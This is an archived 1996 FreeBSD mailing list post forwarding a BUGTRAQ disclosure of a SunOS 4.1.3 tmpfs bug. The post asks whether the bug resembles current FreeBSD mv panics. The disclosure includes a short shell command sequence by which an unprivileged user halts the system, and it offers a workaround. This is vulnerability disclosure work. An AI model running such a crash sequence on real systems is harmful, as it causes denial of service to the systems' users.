Date: Sun, 3 Mar 1996 02:03:33 -0800 (PST) From: invalid opcode <coredump@nervosa.com> To: FreeBSD-current <current@freebsd.org> Subject: Another tmpfs bug in SunOS 4 (fwd) Message-ID: <Pine.BSF.3.91.960303020306.2776C-100000@nervosa.com>
next in thread | raw e-mail | index | archive | help
Hmm, could this be similar to our current problems with mv and panics? == Chris Layne ============================================================= == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == ---------- Forwarded message ---------- Date: Sat, 2 Dec 1995 23:50:40 +0100 From: Arfst Ludwig <Arfst.Ludwig@luxor.in-berlin.de> To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM> Subject: Another tmpfs bug in SunOS 4 Hi! Unprivileged users can crash the system such that a power down power up cyle is needed. Vulnerable OS is (at least) SunOS 4.1.3. With the right permissions (umask) the following sequence crahes the system. The kernel does not panic, nor the abort sequece enters the boot promt, the system is halted, need to power down. 8<------------------------- cut here ------------------------- user1> cd /tmp user1> mkdir foo user1> su user2 user2> mkdir foo/bar user2> touch foo/bar/{plop,blup} user2> exit user1> cd foo user1> mv bar .. 8<------------------------- cut here ------------------------- /tmp's permissons are drwxrwxrwt root wheel I have not explored this bug very much because of the ungracefully consequences. Workaround: Avoid using (the marvelous) TMPFS filesystems :-( or (IMHO even worse) switch to Solaris 2 ? Cheers, Arfst ______________________________________________________________________ __ (00) Arfst Ludwig \`\/ E-Mail: Arfst.Ludwig@luxor.in-berlin.de "" carpe diem
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.91.960303020306.2776C-100000>